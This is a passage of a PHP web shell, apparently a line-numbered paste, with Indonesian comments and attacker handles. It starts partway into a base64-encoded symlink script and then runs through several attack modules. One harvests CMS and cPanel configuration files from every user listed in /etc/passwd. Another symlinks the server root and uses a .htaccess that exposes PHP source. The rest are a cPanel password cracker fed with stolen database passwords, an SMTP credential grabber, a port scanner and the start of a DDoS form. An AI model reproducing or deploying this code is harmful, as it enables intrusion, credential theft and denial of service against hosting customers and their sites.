JHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
3721. $file = "idx_config/vhost.cin";
3722. $handle = fopen($file ,"w+");
3723. fwrite($handle ,base64_decode($vhost));
3724. fclose($handle);
3725. chmod($file, 0755);
3726. if(exe("cd idx_config && ./vhost.cin")) {
3727. echo "<center><a href='$link_config/idx_config'><font color=lime>Done</font></a></center>";
3728. } else {
3729. echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=lime>Done</font></a></center>";
3730. }
3731.  
3732. } else {
3733. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
3734. while($passwd = fgets($etc)) {
3735. if($passwd == "" || !$etc) {
3736. echo "<font color=red>Can't read /etc/passwd</font>";
3737. } else {
3738. preg_match_all('/(.*?):x:/', $passwd, $user_config);
3739. foreach($user_config[1] as $user_idx) {
3740. $user_config_dir = "/home/$user_idx/public_html/";
3741. if(is_readable($user_config_dir)) {
3742. $grab_config = array(
3743. "/home/$user_idx/.my.cnf" => "cpanel",
3744. "/home/$user_idx/.accesshash" => "WHM-accesshash",
3745. "$user_config_dir/po-content/config.php" => "Popoji",
3746. "$user_config_dir/vdo_config.php" => "Voodoo",
3747. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
3748. "$user_config_dir/config/koneksi.php" => "Lokomedia",
3749. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
3750. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
3751. "$user_config_dir/whm/configuration.php" => "WHMCS",
3752. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
3753. "$user_config_dir/forum/config.php" => "phpBB",
3754. "$user_config_dir/sites/default/settings.php" => "Drupal",
3755. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
3756. "$user_config_dir/app/etc/local.xml" => "Magento",
3757. "$user_config_dir/joomla/configuration.php" => "Joomla",
3758. "$user_config_dir/configuration.php" => "Joomla",
3759. "$user_config_dir/wp/wp-config.php" => "WordPress",
3760. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
3761. "$user_config_dir/wp-config.php" => "WordPress",
3762. "$user_config_dir/admin/config.php" => "OpenCart",
3763. "$user_config_dir/slconfig.php" => "Sitelok",
3764. "$user_config_dir/application/config/database.php" => "Ellislab");
3765. foreach($grab_config as $config => $nama_config) {
3766. $ambil_config = file_get_contents($config);
3767. if($ambil_config == '') {
3768. } else {
3769. $file_config = fopen("Mhph_config/$user_idx-$nama_config.txt","w");
3770. fputs($file_config,$ambil_config);
3771. }
3772. }
3773. }
3774. }
3775. }
3776. }
3777. echo "<center><a href='?dir=$dir/Mhph_config'><font color=lime>Done</font></a></center>";
3778.  
3779.  
3780.  
3781. footer();}
3782.  
3783. }
3784.  
3785.  
3786. // END CONFIG //
3787.  
3788.  
3789. // SYSMLINK //
3790.  
3791.  
3792. elseif($_GET['do'] == 'symlink') {
3793. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3794. $d0mains = @file("/etc/named.conf");
3795. ##httaces
3796. if($d0mains){
3797. @mkdir("M0rph1us_sym",0777);
3798. @chdir("M0rph1us_sym");
3799. @exe("ln -s / root");
3800. $file3 = 'Options Indexes FollowSymLinks
3801. DirectoryIndex M0rph1us.htm
3802. AddType text/plain .php
3803. AddHandler text/plain .php
3804. Satisfy Any';
3805. $fp3 = fopen('.htaccess','w');
3806. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
3807. echo "
3808. <table align=center border=1 style='width:60%;border-color:#333333;'>
3809. <tr>
3810. <td align=center><font size=2>S. No.</font></td>
3811. <td align=center><font size=2>Domains</font></td>
3812. <td align=center><font size=2>Users</font></td>
3813. <td align=center><font size=2>Symlink</font></td>
3814. </tr>";
3815. $dcount = 1;
3816. foreach($d0mains as $d0main){
3817. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
3818. flush();
3819. if(strlen(trim($domains[1][0])) > 2){
3820. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3821. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
3822. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
3823. <td>".$user['name']."</td>
3824. <td><a href='$full/M0rph1us_sym/root/home/".$user['name']."/public_html' target='_blank'><font
3825.  
3826. class=txt>Symlink</font></a></td></tr>";
3827. flush();
3828. $dcount++;}}}
3829. echo "</table>";
3830. }else{
3831. $TEST=@file('/etc/passwd');
3832. if ($TEST){
3833. @mkdir("M0rph1us_sym",0777);
3834. @chdir("M0rph1us_sym");
3835. exe("ln -s / root");
3836. $file3 = 'Options Indexes FollowSymLinks
3837. DirectoryIndex M0rph1us.htm
3838. AddType text/plain .php
3839. AddHandler text/plain .php
3840. Satisfy Any';
3841. $fp3 = fopen('.htaccess','w');
3842. $fw3 = fwrite($fp3,$file3);
3843. @fclose($fp3);
3844. echo "
3845. <table align=center border=1><tr>
3846. <td align=center><font size=3>S. No.</font></td>
3847. <td align=center><font size=3>Users</font></td>
3848. <td align=center><font size=3>Symlink</font></td></tr>";
3849. $dcount = 1;
3850. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
3851. while(!feof($file)){
3852. $s = fgets($file);
3853. $matches = array();
3854. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3855. $matches = str_replace("home/","",$matches[1]);
3856. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches
3857.  
3858. == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches ==
3859.  
3860. "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www"
3861.  
3862. || $matches == "var/named")
3863. continue;
3864. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
3865. <td align=center><font class=txt>" . $matches . "</td>";
3866. echo "<td align=center><font class=txt><a href=$full/M0rph1us_sym/root/home/" . $matches . "/public_html
3867.  
3868. target='_blank'>Symlink</a></td></tr>";
3869. $dcount++;}fclose($file);
3870. echo "</table>";}else{if($os != "Windows"){@mkdir("M0rph1us_sym",0777);@chdir("M0rph1us_sym");@exe("ln -s / root");
3871.  
3872. $file3 = '
3873. Options Indexes FollowSymLinks
3874. DirectoryIndex M0rph1us
3875. AddType text/plain .php
3876. AddHandler text/plain .php
3877. Satisfy Any
3878. ';
3879. $fp3 = fopen('.htaccess','w');
3880. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
3881. echo "
3882. <center><h2 class='k2ll33d2'>Symlink Server</h2>
3883. <table align=center border=1><tr>
3884. <td align=center><font size=3>ID</font></td>
3885. <td align=center><font size=3>Users</font></td>
3886. <td align=center><font size=3>Symlink</font></td></tr>";
3887. $temp = "";$val1 = 0;$val2 = 1000;
3888. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
3889. if ($uid)$temp .= join(':',$uid)."\n";}
3890. echo '<br/>';$temp = trim($temp);$file5 =
3891. fopen("M0rph1us.txt","w");
3892. fputs($file5,$temp);
3893. fclose($file5);$dcount = 1;$file =
3894. fopen("M0rph1us.txt", "r") or exit("Unable to open file!");
3895. while(!feof($file)){$s = fgets($file);$matches = array();
3896. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
3897. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches
3898.  
3899. == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches ==
3900.  
3901. "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www"
3902.  
3903. || $matches == "var/named")
3904. continue;
3905. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
3906. <td align=center><font class=txt>" . $matches . "</td>";
3907. echo "<td align=center><font class=txt><a href=$full/M0rph1us/root/home/" . $matches . "/public_html
3908.  
3909. target='_blank'>Symlink</a></td></tr>";
3910. $dcount++;}
3911. fclose($file);
3912. echo "</table></div></center>";unlink("M0rph1us.txt");
3913. } else
3914. echo "<center><font size=3>Cannot create Symlink</font></center>";
3915.  
3916.  
3917.  
3918. footer();}
3919.  
3920. }
3921. }
3922.  
3923. // END SYMLINK //
3924.  
3925.  
3926. // CPANEL //
3927.  
3928.  
3929. elseif($_GET['do'] == 'cpanel') {
3930. if($_POST['crack']) {
3931. $usercp = explode("\r\n", $_POST['user_cp']);
3932. $passcp = explode("\r\n", $_POST['pass_cp']);
3933. $i = 0;
3934. foreach($usercp as $ucp) {
3935. foreach($passcp as $pcp) {
3936. if(@mysql_connect('localhost', $ucp, $pcp)) {
3937. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3938. } else {
3939. $_SESSION[$ucp] = "1";
3940. $_SESSION[$pcp] = "1";
3941. $i++;
3942. echo "username (<font color=cyan>$ucp</font>) password (<font
3943.  
3944. color=cyan>$pcp</font>)<br>";
3945. }
3946. }
3947. }
3948. }
3949. if($i == 0) {
3950. } else {
3951. echo "<br>Nemu ".$i." Cpanel by <font color=cyan>Badc0de</font>";
3952. }
3953. } else {
3954. echo "<center>
3955. <form method='post'>
3956. USER: <br>
3957. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3958. $_usercp = fopen("/etc/passwd","r");
3959. while($getu = fgets($_usercp)) {
3960. if($getu == '' || !$_usercp) {
3961. echo "<font color=red>Can't read /etc/passwd</font>";
3962. } else {
3963. preg_match_all("/(.*?):x:/", $getu, $u);
3964. foreach($u[1] as $user_cp) {
3965. if(is_dir("/home/$user_cp/public_html")) {
3966. echo "$user_cp\n";
3967. }
3968. }
3969. }
3970. }
3971. echo "</textarea><br>
3972. PASS: <br>
3973. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3974. function cp_pass($dir) {
3975. $pass = "";
3976. $dira = scandir($dir);
3977. foreach($dira as $dirb) {
3978. if(!is_file("$dir/$dirb")) continue;
3979. $ambil = file_get_contents("$dir/$dirb");
3980. if(preg_match("/WordPress/", $ambil)) {
3981. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3982. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3983. $pass .= ambilkata($ambil,"password = '","'")."\n";
3984. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3985. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3986. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3987. $pass .= ambilkata($ambil,'password = "','"')."\n";
3988. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",
3989.  
3990. $ambil)) {
3991. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3992. } elseif(preg_match("/client/", $ambil)) {
3993. preg_match("/password=(.*)/", $ambil, $pass1);
3994. if(preg_match('/"/', $pass1[1])) {
3995. $pass1[1] = str_replace('"', "", $pass1[1]);
3996. $pass .= $pass1[1]."\n";
3997. }
3998. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3999. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
4000. }
4001. }
4002. echo $pass;
4003. }
4004. $cp_pass = cp_pass($dir);
4005. echo $cp_pass;
4006. echo "</textarea><br>
4007. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
4008. </form>
4009. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika
4010.  
4011. dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )
4012.  
4013. </span><br></center>";
4014.  
4015.  
4016. footer();}
4017.  
4018. }
4019.  
4020.  
4021. // END CPANEL //
4022.  
4023.  
4024.  
4025.  
4026. // SMTP GRABBER //
4027.  
4028.  
4029. elseif($_GET['do'] == 'smtp') {
4030. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex:
4031.  
4032. /home/user/public_html/nama_folder_config )</span></center><br>";
4033. function scj($dir) {
4034. $dira = scandir($dir);
4035. foreach($dira as $dirb) {
4036. if(!is_file("$dir/$dirb")) continue;
4037. $ambil = file_get_contents("$dir/$dirb");
4038. $ambil = str_replace("$", "", $ambil);
4039. if(preg_match("/JConfig|joomla/", $ambil)) {
4040. $smtp_host = ambilkata($ambil,"smtphost = '","'");
4041. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
4042. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
4043. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
4044. $smtp_port = ambilkata($ambil,"smtpport = '","'");
4045. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
4046. echo "SMTP Host: <font color=cyan>$smtp_host</font><br>";
4047. echo "SMTP port: <font color=cyan>$smtp_port</font><br>";
4048. echo "SMTP user: <font color=cyan>$smtp_user</font><br>";
4049. echo "SMTP pass: <font color=cyan>$smtp_pass</font><br>";
4050. echo "SMTP auth: <font color=cyan>$smtp_auth</font><br>";
4051. echo "SMTP secure: <font color=cyan>$smtp_secure</font><br><br>";
4052. }
4053. }
4054. }
4055. $smpt_hunter = scj($dir);
4056. echo $smpt_hunter;
4057.  
4058.  
4059. footer();}
4060.  
4061.  
4062. // END SMTP GRABBER //
4063.  
4064.  
4065.  
4066. // PORT SCANNER //
4067.  
4068.  
4069. elseif ($_GET['do'] == 'port') {
4070. echo '<center><div style="text-align:left"><table><tr><h1>Port Scanner</h1><td>';
4071. echo '<div class="content">';
4072. echo '<form action="" method="post">';
4073. if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
4074. $start = strip_tags($_POST['start']);
4075. $end = strip_tags($_POST['end']);
4076. $host = strip_tags($_POST['host']);
4077. for ($i = $start;$i <= $end;$i++) {
4078. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
4079. if ($fp) {
4080. echo 'Port ' . $i . ' is <font color=green>open</font><br>';
4081. }
4082. flush();
4083. }
4084. } else {
4085. echo '<input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input
4086.  
4087. type="hidden" name="p2">
4088. <input type="hidden" name="c" value="' . htmlspecialchars($GLOBALS['cwd']) . '">
4089. <input type="hidden" name="charset" value="' . (isset($_POST['charset']) ? $_POST['charset'] :
4090.  
4091. '') . '">
4092. Host: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px
4093.  
4094. solid #292929; width:500px;" name="host" value="localhost"/><br /><br />
4095. Port Start: &nbsp<input type="text" style="border:0;border-bottom:1px solid #292929;
4096.  
4097. width:500px;" name="start" value="0"/><br /><br />
4098. Port End:&nbsp&nbsp&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px solid #292929;
4099.  
4100. width:500px;" name="end" value="5000"/><br /><br />
4101. <input type="submit" style="width: 100px; height: 30px; border-color=white;margin:10px 2px 0
4102.  
4103. 2px;" value="Scan Ports !" />
4104. </form>';
4105. echo '</div></table></td></div>';
4106.  
4107.  
4108.  
4109. footer();}
4110.  
4111. }
4112.  
4113. // END PORT SCANNER //
4114.  
4115.  
4116.  
4117. // DDOS ATTACK //
4118.  
4119. elseif($_GET['do'] == 'ddos')
4120. {
4121. ?>
4122. <form action=" " method="post">
4123. <center><br><br><br>
4124. Your IP: <font color="#ff0066"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don't DoS yourself nub)<br><br>
4125. <table class="tabnet" style="width:333px;padding:0 1px;">
4126. <th colspan="5">Ddos Tool</th>
4127. <tr><tr><td>IP Target</td><td>:</td>
4128. <td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if (
4129.  
4130. this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
4131. </td></tr>
4132. <tr><td>Time</td><td>:</td>
4133. <td><input type="text" class="inputz" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur
4134.  
4135. = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)'
4136.  
4137. ) this.value = '';"/>
4138. </td></tr>
4139.  
4140. <tr><td>Port</td><td>:</td>
4141. <td><input type="text" class="inputz" name="port" size="48" maxlength="5" value = "port" onblur = "if (
4142.  
